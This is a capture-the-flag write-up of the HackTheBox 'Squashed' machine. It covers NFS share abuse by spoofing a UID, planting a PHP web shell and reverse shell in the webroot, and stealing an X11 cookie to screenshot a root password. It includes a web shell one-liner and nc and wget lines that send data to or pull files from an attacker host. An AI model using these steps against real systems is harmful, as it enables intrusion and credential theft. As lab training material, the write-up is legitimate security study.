We enumerate NFS shares, and upload a Web Shell . We also performed Linux privilege escalation by getting an X11 magic cookie from a different NFS share and using it to get a screenshot of the current user’s desktop, showing the root password in a password manager. This was part of HackTheBox Squashed machine.
Squashed is an Easy Difficulty Linux machine that features a combination of both identifying and leveraging misconfigurations in NFS shares through impersonating users. Additionally, the box incorporates the enumeration of an X11 display into the privilege escalation by having the attacker take a screenshot of the current Desktop.
Initial Enumeration & Gaining Access
I started with an nmap scan to identify open ports, which revealed ports 22 (SSH), 80 (HTTP), 111 (RPCbind), and 2049 (NFS).
Next, I focused on enumerating NFS shares using showmount -e <IP_ADDRESS>. I found two shares: /home/ross and /var/www/html.
I then mounted the /var/www/html share. Initially, listing its contents resulted in “permission denied.” I checked the directory permissions and saw a user ID of 2017 and group www-data. To gain access, I created a new local user named squashed with the same UID (2017) using useradd squashed and usermod -u 2017 squashed. After switching to this new user with su squashed, I could successfully list the contents of the mounted /var/www/html share.
Since this was the webroot and I had write access, I created a simple PHP web shell using echo '<?php system($_GET["cmd"]); ?>' > shell.php. I then copied a more robust PHP reverse shell (from PenTestMonkey) to the mounted webroot. Accessing this PHP reverse shell via the browser granted me an initial shell as the user “Alex”.
Privilege Escalation via X11 Authorization
In Alex’s home directory, I noticed an Xauthority file, but it was initially inaccessible. I then mounted the /home/ross NFS share to access Ross’s Xauthority file. After unmounting the previous share and creating a new directory for this mount, I viewed the content of Ross’s Xauthority file (a magic cookie).
I transferred this Xauthority file from the mounted share (acting as a server) to the compromised machine (Alex’s shell) using wget. Before that, I started a Python web server on my attacker machine in the directory containing the Xauthority file. On the victim machine, as Alex, I ran wget http://<ATTACKER_IP>:<PORT>/Xauthority.
My goal was to see which users were connected to the X display and impersonate them. I used the w command to find the display ID, followed by xdpyinfo -display :0 for more display information. I then used xwininfo -root -tree to check if the root user was connected to the display, which it was!
Since root was connected, I took a screenshot of the X display, as the scenario implied the root user might have left a Keepass window open with credentials. I used the command xwd -root -display :0 -out screenshot.xwd to capture the screenshot and saved it to /tmp/squashed_root.
I then transferred the screenshot file (.xwd) from the victim machine to my attacker machine using netcat. On my attacker machine, I set up a listener with nc -lvnp <PORT> > screenshot.xwd, and on the victim machine, as Alex, I sent the file with cat /tmp/squashed_root | nc <ATTACKER_IP> <PORT>.
Finally, I converted the .xwd file to a .png file using ImageMagick tools. I installed them with sudo apt update && sudo apt install imagemagick, and then converted the file with convert screenshot.xwd screenshot.png. Opening the PNG revealed the root username and password from the Keepass window. I then used the su root command with the obtained root credentials to gain root access.
Alternative Mentioned
The video also mentioned an alternative method: using Metasploit with an X11 exploit to get a shell on the display server if screenshotting doesn’t yield useful information. This method also requires the Xauthority file.
